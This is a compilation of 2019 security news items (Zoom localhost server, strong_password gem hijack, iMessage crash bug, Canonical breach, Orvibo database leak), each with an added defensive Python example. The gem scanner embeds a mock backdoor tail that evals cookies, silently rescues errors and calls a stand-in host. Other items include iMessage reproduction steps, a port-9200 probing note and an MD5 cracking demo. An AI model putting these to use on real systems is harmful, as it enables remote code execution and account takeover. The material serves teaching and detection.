In a statement to The Verge, Zoom said the local web server was developed "to save users some clicks after Apple changed its Safari web browser in a way that requires Zoom users to confirm that they want to launch Zoom each time". Zoom defended the "workaround" as "a legitimate solution to poor user experience, enabling our users to have seamless, one-click-to-join meetings, which is our key product differentiator." The company said it would make some minor changes to the app this month: "Zoom will save users' and administrators' preferences for whether the video will be turned on, or not when they first join a call", the company said.

https://twitter.com/backlon/status/1148464344876716033

This response puts the burden on users, who now have to turn their cameras off, while the company gets away with a minor app change for a serious security lapse that warranted a far bigger step. Many are unhappy with the way Zoom is handling the vulnerability.

https://twitter.com/chadloder/status/1148375915329495040
https://twitter.com/ticky/status/1148389970073096192

Users can mitigate the camera issue themselves by updating their Mac and disabling the setting that allows Zoom to turn the camera on when joining a meeting. As mentioned earlier, the local web server can re-install the application, so users are also advised to run a few terminal commands to turn it off. Leitschuh explains these commands in detail in his blog post on Medium.
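Since the whole issue rests on a web server that Zoom leaves listening on localhost, the first thing a practitioner wants to know is whether such a listener is present on a machine at all. The following is an added example, my code rather than Zoom's or Leitschuh's: it parses the output of lsof -nP -iTCP -sTCP:LISTEN into records and filters them by process name, noting whether each service is bound to loopback only or to all interfaces. The sample lsof output, the helper name ZoomOpener and the port number in it are constructed for illustration and are not taken from the article.

```python
# Added example (not Zoom's or Leitschuh's code): list the local TCP services a
# web page could reach, by parsing the output of `lsof -nP -iTCP -sTCP:LISTEN`.
# The sample output below is constructed; the helper name and port are illustrative.
import subprocess
from dataclasses import dataclass

LOOPBACK = {"127.0.0.1", "[::1]", "localhost"}


@dataclass(frozen=True)
class Listener:
    command: str
    pid: int
    address: str
    port: int

    @property
    def loopback_only(self) -> bool:
        # Bound to loopback only: other hosts cannot connect, but the local
        # browser still can, which is exactly the exposure described above.
        return self.address in LOOPBACK


def parse_lsof(output: str):
    """Turn lsof's table into Listener records using its NAME column ("host:port")."""
    listeners = []
    for line in output.splitlines()[1:]:        # first row is the header
        fields = line.split()
        if len(fields) < 10 or fields[-1] != "(LISTEN)":
            continue
        address, _, port = fields[-2].rpartition(":")
        if port.isdigit():
            listeners.append(Listener(fields[0], int(fields[1]), address, int(port)))
    return listeners


def listeners_named(listeners, fragment: str):
    """Listeners whose process name contains fragment (case-insensitive)."""
    return [l for l in listeners if fragment.lower() in l.command.lower()]


def audit(fragment: str = "zoom"):
    """Run lsof on this machine (macOS/Linux) and report matching listeners."""
    proc = subprocess.run(["lsof", "-nP", "-iTCP", "-sTCP:LISTEN"],
                          capture_output=True, text=True, check=False)
    return listeners_named(parse_lsof(proc.stdout), fragment)


# Constructed sample in lsof's column layout:
# COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
SAMPLE_LSOF = """\
COMMAND     PID  USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
ZoomOpener  512 alice    3u  IPv4 0x1a2b      0t0  TCP 127.0.0.1:19421 (LISTEN)
postgres    640 alice    5u  IPv6 0x3c4d      0t0  TCP [::1]:5432 (LISTEN)
sshd         88  root    4u  IPv4 0x5e6f      0t0  TCP *:22 (LISTEN)
"""

if __name__ == "__main__":
    for l in audit():
        print(f"{l.command} (pid {l.pid}) listens on {l.address}:{l.port}; "
              f"{'loopback only' if l.loopback_only else 'ALL interfaces'}")
```

A loopback-only binding is what makes this class of bug easy to dismiss: nothing on the network can reach the service, yet any page the user's browser loads can still send it requests, so a listener that shows up here as "loopback only" is still exposed to every website visited. The removal steps themselves are the ones the article defers to Leitschuh's post.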

RubyGems strong_password v0.0.7 hijacked; infected thread and attacker account isolated for now

Vincy Davis
08 Jul 2019
4 min read
Last week, developer Tute Costa notified Ruby users that the strong_password rubygem had been hijacked. A malicious actor published v0.0.7 containing code that let the attacker execute arbitrary code remotely in production. The malicious version has since been yanked and the attacker's RubyGems account locked.

strong_password is an entropy-based password strength checker for Ruby and ActiveModel.

How was the strong_password v0.0.7 hijack identified?

While linking each updated library, line by line, to its changeset, Costa noticed that strong_password had gone from 0.0.6 to 0.0.7, even though the last change on any branch in GitHub was six months old. Costa then downloaded the gem from RubyGems and compared its contents with the latest copy in GitHub. At the end of lib/strong_password/strength_checker.rb in version 0.0.7 he found the following:

Image Source: With a Twist Dev

Costa found that the gem had been published by an empty account, with a different name from the maintainer's, after that account had been given ownership of the gem. He forwarded the thread to the strong_password maintainer's email address listed in GitHub. Brian McManus, the strong_password maintainer, replied, "The gem seems to have been pulled out from under me. When I login to rubygems.org I don't seem to have ownership now. Bogus 0.0.7 release was created 6/25/2019."

How does the malicious code work?

If the code has not already run (it checks for the existence of a dummy constant, Z1), it injects a middleware that evals the values of cookies whose names end in ___id, but only in production. The whole thing is wrapped in an empty exception handler, a _! function defined in the hijacked gem, so any failure is swallowed silently. This opens the door for the attacker to execute remote code in production without leaving an error behind.
The malicious code also sends a request to an attacker-controlled domain with an HTTP header reporting the infected host's URL.

What is the current status of strong_password v0.0.7?

Rafael França, the Ruby on Rails security coordinator, added security@rubygems.org to the thread. André Arko, the founder of Ruby Together, then yanked the malicious version and locked the attacker's RubyGems account. McManus was later restored as an owner of the gem. Costa also notified users that he had requested a CVE identifier (Common Vulnerabilities and Exposures) from cve-request@mitre.org and received CVE-2019-13354, which he used "to announce the potential issue in production installations to the rubysec/ruby-advisory-db project and the ruby-security-ann Google Group."

The community has been praising Tute Costa for his efforts in uncovering the hijack.

https://twitter.com/mjos_crypto/status/1148153570631589889

A user on Hacker News states, "In light of vulnerabilities like these, I'm glad there are developers that spend time to make their apps more secure. Thus, making us all aware that issues like these are out there. Security is almost always just put off in exchange for features and security is most of the time taken for granted. It's about time that we start taking it seriously. Kudos to you!"

Many users are also skeptical about RubyGems' security. A user on Hacker News says, "There's still a lot to learn about this incident, but most likely the RubyGems account was compromised, allowing the attacker to upload whatever they wanted. Signed releases with a web of trust would be ideal, but I doubt we'll ever see that world. A simple and pragmatic solution would be to have the next version of bundler support the ability to only install packages published with 2 factor enabled, then the next major rails version default it to on, with plenty of advanced warning in 6.x/bundler.
This still has plenty of gaps, such as an attacker being able to take over even with 2 factor, and then re-enabling it with their own keys, or RubyGems.org itself being compromised. It still represents a major upgrade in security for the entire Ruby ecosystem without causing much pain to authors and users."

Another comment reads, "Rubygem should contract an external auditor (security firm), this could go way deeper. Until they perform a thorough audit I will personally stay away from this project."
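The check that surfaced this hijack was mechanical: download the published gem and compare it with the source tree it claims to come from. The following is an added example, my code rather than Costa's script: it unpacks a .gem (an outer tar holding data.tar.gz), lists the lines the published files contain that the source checkout does not, and scans those added lines for the behaviours described under "How does the malicious code work?" (eval of request data, a rescue that swallows everything, a callback to a remote host). The gem archive, the "source checkout" and the tampered tail are all constructed in memory for the example; the tail only mirrors the described behaviour and is not the real payload.

```python
# Added example (not Costa's script): unpack a .gem, diff each file against the
# source checkout, and scan the lines the gem adds for the behaviours described
# above (eval of request data, a swallow-everything rescue, a remote callback).
# The gem archive, the "source checkout" and the tampered tail are constructed.
import gzip
import io
import re
import tarfile

SUSPICIOUS = [
    ("eval_of_request_data",
     re.compile(r"(cookie|params|request).*\beval\b|\beval\b.*(cookie|params|request)", re.I)),
    ("silent_rescue", re.compile(r"rescue\s+Exception\b\s*(;|$)")),
    ("remote_callback", re.compile(r"Net::HTTP|open-uri|URI\.open", re.I)),
    ("encoded_payload", re.compile(r"Base64\.(urlsafe_)?decode|\.unpack\(\s*['\"]m", re.I)),
]


def gem_files(gem_bytes: bytes) -> dict:
    """Map path -> text for every file in the gem's data.tar.gz."""
    with tarfile.open(fileobj=io.BytesIO(gem_bytes), mode="r:") as outer:
        data = outer.extractfile("data.tar.gz").read()
    files = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as inner:
        for member in inner.getmembers():
            if member.isfile():
                files[member.name] = inner.extractfile(member).read().decode()
    return files


def added_lines(gem: dict, source: dict) -> dict:
    """Per file, the lines the published gem contains that the source tree does not."""
    out = {}
    for path, text in gem.items():
        known = set(source.get(path, "").splitlines())
        extra = [ln for ln in text.splitlines() if ln not in known]
        if extra:
            out[path] = extra
    return out


def flag(lines) -> list:
    """Names of the SUSPICIOUS patterns matched anywhere in lines, in rule order."""
    return [name for name, pat in SUSPICIOUS if any(pat.search(ln) for ln in lines)]


def review_gem(gem_bytes: bytes, source: dict) -> dict:
    """path -> suspicious pattern names, for every file that differs from source."""
    return {path: flag(lines) for path, lines in added_lines(gem_files(gem_bytes), source).items()}


def _tar(files: dict, compress: bool) -> bytes:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz" if compress else "w") as tf:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_gem(files: dict) -> bytes:
    """A minimal .gem: an outer tar holding metadata.gz and data.tar.gz."""
    metadata = gzip.compress(b"--- !ruby/object:Gem::Specification\nname: strong_password\n")
    data = _tar({p: t.encode() for p, t in files.items()}, compress=True)
    return _tar({"metadata.gz": metadata, "data.tar.gz": data}, compress=False)


CHECKER_PATH = "lib/strong_password/strength_checker.rb"
CLEAN_CHECKER = """\
module StrongPassword
  class StrengthChecker
    def is_strong?(password)
      entropy(password) > 18
    end
  end
end
"""
SOURCE_TREE = {CHECKER_PATH: CLEAN_CHECKER}

# Tail that mirrors the described behaviour (illustrative, not the real payload).
TAMPERED_CHECKER = CLEAN_CHECKER + """\
def _!; begin; yield; rescue Exception; end; end
_!{ Net::HTTP.get(URI('https://example.invalid/ping')) }
_!{ Rack::Builder.new.use(Class.new { def call(env); Rack::Request.new(env).cookies.each { |k, v| eval(v) if k.end_with?('___id') }; end }) } unless defined?(Z1)
"""

if __name__ == "__main__":
    print(review_gem(build_gem({CHECKER_PATH: TAMPERED_CHECKER}), SOURCE_TREE))
    print(review_gem(build_gem(SOURCE_TREE), SOURCE_TREE))
```

Run against a real gem, the source dict would come from a checkout of the tag the version claims to correspond to (gem fetch strong_password -v 0.0.7 gives the archive). The line-set diff is deliberately crude: it ignores reordering and reports any line not present in the source file, which is what you want here, since the question is "did anything get added", not "is this a clean patch".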

Google Project Zero reveals an iMessage bug that bricks iPhone causing repetitive crash and respawn operations

Savia Lobo
08 Jul 2019
3 min read
A vulnerability in Apple's iMessage that bricks an iPhone and survives hard resets was recently brought to light. A specifically malformed message sent to a victim device leaves the user no option but to factory-reset it.

The issue was first filed by Google Project Zero researcher Natalie Silvanovich on the project's issue tracker on April 19, 2019. Under Project Zero's usual 90-day disclosure deadline, the bug was held from public view until either 90 days had elapsed or a patch had been made broadly available. On 4th July, Silvanovich noted that the issue was fixed in Apple's iOS 12.3 update, and the report was made public.

Tracked as CVE-2019-8573 and CVE-2019-8664, the bug causes the affected process on a Mac to crash and respawn. On an iPhone, Silvanovich says, the code lives in Springboard, and "receiving this message will cause Springboard to crash and respawn repeatedly, causing the UI not to be displayed and the phone to stop responding to input. The only way I could find to fix the phone is to reboot into recovery mode and do a restore. This causes the data on the device to be lost".

According to Forbes, "The message contains a property with a key value that is not a string, despite one being expected. Calling a method titled IMBalloonPluginDataSource _summaryText, the method assumes the key in question is a string but does not verify it is the case". The subsequent call to IMBalloonPluginDataSource replaceHandlewithContactNameInString invokes im_handleIdentifiers on the supposed string, which throws an exception.
For testing purposes, Silvanovich, in her update to the report, listed three ways she found to unbrick the device:
• wipe the device with 'Find my iPhone'
• put the device in recovery mode and update via iTunes (note that this will force an update to the latest version)
• remove the SIM card, go out of Wifi range and wipe the device from the menu

Google Project Zero has also released instructions to reproduce the issue:
• install frida (pip3 install frida)
• open sendMessage.py, and replace the sample receiver with the phone number or email of the target device
• in the local directory, run: python3 sendMessage.py

Users should make sure their iPhone is up to date with the latest iOS 12.3 update. Read more about the vulnerability on Google Project Zero's issue page.
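The bug class here is a deserialized property being used as a string without checking that it is one, and the consequence being worse than a single failure because the process that crashes is restarted and handed the same message again. The following is an added example, my code rather than Apple's or Project Zero's: it shows the unchecked accessor beside a checked one on a constructed binary plist message, and a receiver that drops a malformed message instead of letting it crash the host. The key names 'summary' and 'handle' are hypothetical; the real iMessage keys and layout are not in the article.

```python
# Added example (not Apple's or Project Zero's code): the bug class described
# above, a deserialized property assumed to be a string, on a constructed plist
# message. The key names 'summary' and 'handle' are hypothetical.
import plistlib


class MalformedMessage(ValueError):
    pass


def summary_text_unchecked(message: dict) -> str:
    """Mirrors the faulty assumption: uses message['summary'] as a string without checking."""
    return message["summary"].replace("%handle", message["handle"])


def summary_text_checked(message: dict) -> str:
    """Validate the types first and reject the message rather than blow up in the caller."""
    summary, handle = message.get("summary"), message.get("handle")
    if not isinstance(summary, str) or not isinstance(handle, str):
        raise MalformedMessage(
            f"summary is {type(summary).__name__}, handle is {type(handle).__name__}")
    return summary.replace("%handle", handle)


def render_incoming(payload: bytes) -> str:
    """Receiver side: parse, validate, and drop a bad message so that one
    malformed payload cannot push the UI process into a crash/respawn loop."""
    try:
        return summary_text_checked(plistlib.loads(payload))
    except (plistlib.InvalidFileException, MalformedMessage, KeyError):
        return "(unreadable message)"


def raises(fn, payload: bytes) -> bool:
    """True if fn blows up on the decoded payload (the crash the report describes)."""
    try:
        fn(plistlib.loads(payload))
        return False
    except Exception:
        return True


# Constructed messages: well-formed, and one whose 'summary' is an array where a
# string is expected (the shape of the bug, not Apple's real keys or layout).
GOOD = plistlib.dumps({"summary": "%handle shared a photo", "handle": "+15555550100"},
                      fmt=plistlib.FMT_BINARY)
BAD = plistlib.dumps({"summary": ["not", "a", "string"], "handle": "+15555550100"},
                     fmt=plistlib.FMT_BINARY)

if __name__ == "__main__":
    print(render_incoming(GOOD))
    print(render_incoming(BAD))
    print(raises(summary_text_unchecked, BAD), raises(summary_text_checked, GOOD))
```

The checked version still fails on the bad message, but with a typed error at a point where the receiver can catch it and discard the message; the unchecked version fails somewhere in the caller, which in the real bug is the process that gets respawned and re-fed the same message.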

Canonical, the company behind the Ubuntu Linux distribution, was hacked; Ubuntu source code unaffected

Sugandha Lahoti
08 Jul 2019
2 min read
On Saturday, a GitHub account owned by Canonical Ltd, the company behind Ubuntu, was compromised and used to create repositories and issues, among other activity. The unknown attacker(s) used the credentials of that Canonical-owned account to gain unauthorized access to Canonical's GitHub organization. According to a mirror of the hacked account, the attacker created 11 new GitHub repositories in the official Canonical organization. The repositories were empty and sequentially named, starting with CAN_GOT_HAXXD_1; no existing data was changed or deleted, and the Ubuntu source code is unaffected.

A Canonical representative said in a statement, "There is no indication at this point that any source code or PII was affected. Furthermore, the Launchpad infrastructure where the Ubuntu distribution is built and maintained is disconnected from GitHub and there is also no indication that it has been affected."

The hack appears to have been limited to a defacement: had the attacker(s) added malicious code to Canonical projects, they would hardly have drawn attention to themselves by creating new repositories in the Canonical GitHub account.

The official Ubuntu forums have been hacked on three previous occasions: in July 2013, when attackers stole the details of 1.82 million users; in July 2016, when the data of two million users was compromised; and in December 2016, when the credentials of 1.8 million users were stolen. In May this year, attackers wiped many GitHub, GitLab, and Bitbucket repos using compromised but valid credentials, leaving a ransom note behind.

Canonical has since removed the compromised account from the Canonical organisation on GitHub and is still investigating the extent of the breach. The Ubuntu security team said it plans to post a public update once its investigation, audit and remediations are finished. Twitter was flooded with people warning others about the hack.
https://twitter.com/zackwhittaker/status/1147683774492303360
https://twitter.com/gcluley/status/1147901110503575552
https://twitter.com/evanderburg/status/1147895949697568770

Unprotected Elasticsearch database exposes 2 billion user records from smart home devices

Savia Lobo
05 Jul 2019
5 min read
Security researchers Noam Rotem and Ran Locar of vpnMentor recently revealed in a report that Orvibo, a Shenzhen-based Chinese IoT management platform company, had left its user database exposed online without any password protection. The Elasticsearch database, which holds data collected from smart home devices, contains "2 billion logs" with everything from user passwords to account reset codes, and even conversations recorded by a "smart" camera.

Sample of Orvibo leaked data

The leaked data included email addresses, passwords, precise geolocation, IP addresses, usernames, user IDs, family names and IDs, smart device identifiers, the device used to access the account, scheduling information, and account reset codes. Of these, the logged passwords and password reset codes cause the most additional trouble. The passwords were not stored in plaintext: they had been hashed with MD5, but without a salt. "Unfortunately, the MD5 algorithm used to hash these passwords isn't considered particularly secure as it has been found to contain a whole bunch of vulnerabilities". "Orvibo does make some effort into concealing the passwords, which are hashed using MD5 without salt," the vpnMentor team said. Unsalted MD5 hashes are relatively easy to crack, however, which means that anyone with access to this database could hijack SmartMate accounts and possibly take control of the smart devices in a user's SmartMate-controlled home.

The researchers said the reset codes were the most dangerous pieces of information in the database. "These would be sent to a user to reset either their password or their email address," the report explains, continuing, "with that information readily accessible, a hacker could lock a user out of their account without needing their password. Changing both a password and an email address could make the action irreversible."
According to ZDNet, "The database was spotted in mid-June by the security team at vpnMentor, led by security researchers Noam Rotem and Ran Locar, who shared their findings with ZDNet last month and asked for help in notifying the vendor." Since then, both vpnMentor and ZDNet have contacted the Chinese company about the exposure; at the time of the ZDNet report, Orvibo had not responded or taken any action.

Forbes notes, "The Orvibo website boasts of a secure cloud providing a "reliable smart home cloud platform," and goes on to mention how it "supports millions of IoT devices and guarantees the data safety."

Geoff Tudor, general manager of Vizion.ai, told Forbes that Elasticsearch breaches are becoming almost everyday occurrences. "When first installed, Elasticsearch's API is completely open without any password protection," Tudor says, adding, "all a hacker needs to do is to hit a URL with http://[serverIP]:9200 and a user can see if an Elasticsearch is operational. Then it takes a single command to search through the data stored in it..."

Orvibo claims a large user base, including private individuals with smart home systems as well as hotels and other business customers. The vpnMentor report states that it found logs for users in China, Japan, Thailand, Mexico, France, Australia, Brazil, the United Kingdom, and the U.S. The report concludes, "With the information that has leaked. It's clear that there is nothing secure about these devices. Even having one of these devices installed could undermine, rather than enhance, your physical security."

How can users secure their data and be safe?

Jake Moore, a cybersecurity specialist at ESET, said, "Criminal groups may have been aware of this vulnerability but it is unknown if anyone has taken advantage of this flaw yet. I'd hope it would be patched quite quickly now it is out."
Moore further advises, "The best thing now for people affected is to make sure their smart device passwords are changed immediately to something long and complex along with other accounts where the same password may be reused," and points out that "they may as well pull the plug on the device until it is fixed."

Ilia Kolochenko, founder and CEO of web security company ImmuniWeb, said affected users can go a step further than changing their passwords and "file a legal complaint and deactivate any remote management of their homes if it is doable."

Yesterday, Orvibo responded, saying it had secured the database: "Once we received this report on July 2nd, ORVIBO's RD team took immediate actions to resolve security vulnerability". The company said it has ta
ken the following steps to resolve the issue:
• Resolved security vulnerability.
• Upgraded encryption mechanism of password.
• Upgrade the protection on users account and password resetting.
• Strengthening cooperation with professional cyber security companies to improve our system security.

To know more about this news, read the complete vpnMentor report.
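The vpnMentor team's point that the passwords were "hashed using MD5 without salt" is the difference between a leak of hashes and a leak of passwords. The following is an added example, my code rather than vpnMentor's or Orvibo's: it cracks a constructed set of unsalted MD5 hashes with one precomputed table, then stores the same passwords with a random per-user salt and PBKDF2 (the standard library's slow hash; bcrypt, scrypt or Argon2 are the usual alternatives) and counts how much work the same wordlist attack now costs. The wordlist, the "leaked" hashes and the stored records are constructed for the example.

```python
# Added example (not vpnMentor's or Orvibo's code): why unsalted MD5 in a leaked
# database is close to plaintext, beside the salted, slow hashing that fixes it.
# The wordlist, the "leaked" hashes and the stored records are constructed.
import hashlib
import hmac
import os

WORDLIST = ["123456", "password", "orvibo2019", "qwerty", "letmein"]
ROUNDS = 200_000   # PBKDF2 iteration count; tune to roughly 100 ms on the login servers


def md5_unsalted(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


def crack_unsalted(leaked_hashes, wordlist):
    """One precomputed table serves every user: |wordlist| hashes, however many accounts."""
    table = {md5_unsalted(w): w for w in wordlist}
    recovered = {h: table[h] for h in leaked_hashes if h in table}
    return recovered, len(wordlist)


def pbkdf2(password: str, salt: bytes) -> str:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ROUNDS).hex()


def store(password: str) -> dict:
    """What to write instead: a random per-user salt and a slow, salted hash."""
    salt = os.urandom(16)
    return {"salt": salt.hex(), "hash": pbkdf2(password, salt)}


def verify(password: str, record: dict) -> bool:
    candidate = pbkdf2(password, bytes.fromhex(record["salt"]))
    return hmac.compare_digest(candidate, record["hash"])   # constant-time compare


def crack_salted(records, wordlist):
    """No shared table: every guess is recomputed per salt, and each costs ROUNDS iterations."""
    recovered, computed = {}, 0
    for i, rec in enumerate(records):
        for word in wordlist:
            computed += 1
            if verify(word, rec):
                recovered[i] = word
                break
    return recovered, computed


# Constructed leak: three users, two with wordlist passwords, stored both ways.
USERS = ["orvibo2019", "123456", "Tr0ub4dor&3"]
LEAKED_MD5 = [md5_unsalted(p) for p in USERS]
SALTED_RECORDS = [store(p) for p in USERS]

if __name__ == "__main__":
    print(crack_unsalted(LEAKED_MD5, WORDLIST))
    print(crack_salted(SALTED_RECORDS, WORDLIST))
```

Both attacks recover the same two weak passwords, which is the honest caveat: salting and stretching do not rescue "123456". What changes is the cost model. The unsalted table is built once and then answers for every record in a two-billion-entry database; with a per-user salt there is nothing to precompute, every guess is paid for per account, and the iteration count sets the price of each guess. The reset codes the researchers flagged are a separate problem that no hashing fixes: secrets of that kind should not be written to logs at all.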